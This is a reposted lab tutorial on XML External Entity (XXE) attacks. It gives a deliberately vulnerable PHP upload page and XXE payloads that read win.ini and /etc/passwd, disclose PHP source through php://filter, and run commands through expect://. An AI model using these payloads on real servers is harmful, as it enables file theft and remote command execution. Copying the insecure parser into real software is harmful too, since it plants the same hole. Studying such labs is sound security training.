Lab - XML eXternal Entity Attack

前端之家收集整理的这篇文章主要介绍了Lab - XML eXternal Entity Attack前端之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。

Prepare

Lab

  1. Linux kali 3.14-kali1-686-pae

Requments

  1. # apt-get install libapache2-mod-PHP5 PHP-xml-dtd PHP-xml-parser libexpect-PHP5

Demo Code

  1. <html>
  2. <body>
  3. <h1>Process XML</h1>
  4.  
  5. <form action="" method="post" enctype="multipart/form-data">
  6. <label for="file">Archive XML:</label>
  7. <input type="file" name="file" id="file">
  8. <input type="submit" name="submit" value="submit"><br />
  9. </form>
  10. <hr>
  11. <h1>Results</h1>
  12. <?PHP # error_reporting(E_ALL); # ini_set("display_errors",1); if ( isset($_FILES["file"]) ) { $doc = new DOMDocument(); $doc->validateOnParse = true; $doc->Load($_FILES["file"]["tmp_name"]); $tags = $doc->getElementsByTagName("data"); foreach($tags as $tag) { echo "<pre>" . $tag->nodeValue . "</pre>\n"; } } else { echo "invalid xml format"; } ?>
  13.  
  14. </body>
  15. </html>

Exploit


Windows

File Inclusion

  1. <?xml version="1.0" encoding="utf-8"?>
  2. <!DOCTYPE somexml[<!ENTITY message SYSTEM "file:///C:/Windows/win.ini">]>
  3. <xxx>&message;</xxx>

Source Disclosure

  1. <?xml version="1.0" encoding="utf-8"?>
  2. <!DOCTYPE somexml[<!ENTITY message SYSTEM "PHP://filter/read=convert.base64-encode/resource=C:/xampp/htdocs/recv.PHP">]>
  3. <xxx>&message;</xxx>

Linux

File Inclusion

  1. <?xml version="1.0" encoding="utf-8"?>
  2. <!DOCTYPE somexml [<!ENTITY hello SYSTEM "file:///etc/passwd">]>
  3. <somexml><message>&hello;</message></somexml>

Source Disclosure

  1. <?xml version="1.0" encoding="utf-8"?>
  2. <!DOCTYPE somexml [<!ENTITY hello SYSTEM "PHP://filter/read=convert.base64-encode/resource=/var/www/xxe.PHP">]>
  3. <somexml><message>&hello;</message></somexml>

Command Execution

  1. <?xml version="1.0" encoding="utf-8"?>
  2. <!DOCTYPE somexml [<!ENTITY hello SYSTEM "expect://dir">]>
  3. <somexml><message>&hello;</message></somexml>

References

  1. https://pentesterlab.com/exercises/play_xxe
  2. http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html
  3. http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html
  4. http://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
  5. http://phpsecurity.readthedocs.org/en/latest/Injection-Attacks.html
  6. http://stackoverflow.com/questions/24117700/clarifications-on-xxe-vulnerabilities-throughout-php-versions

猜你在找的XML相关文章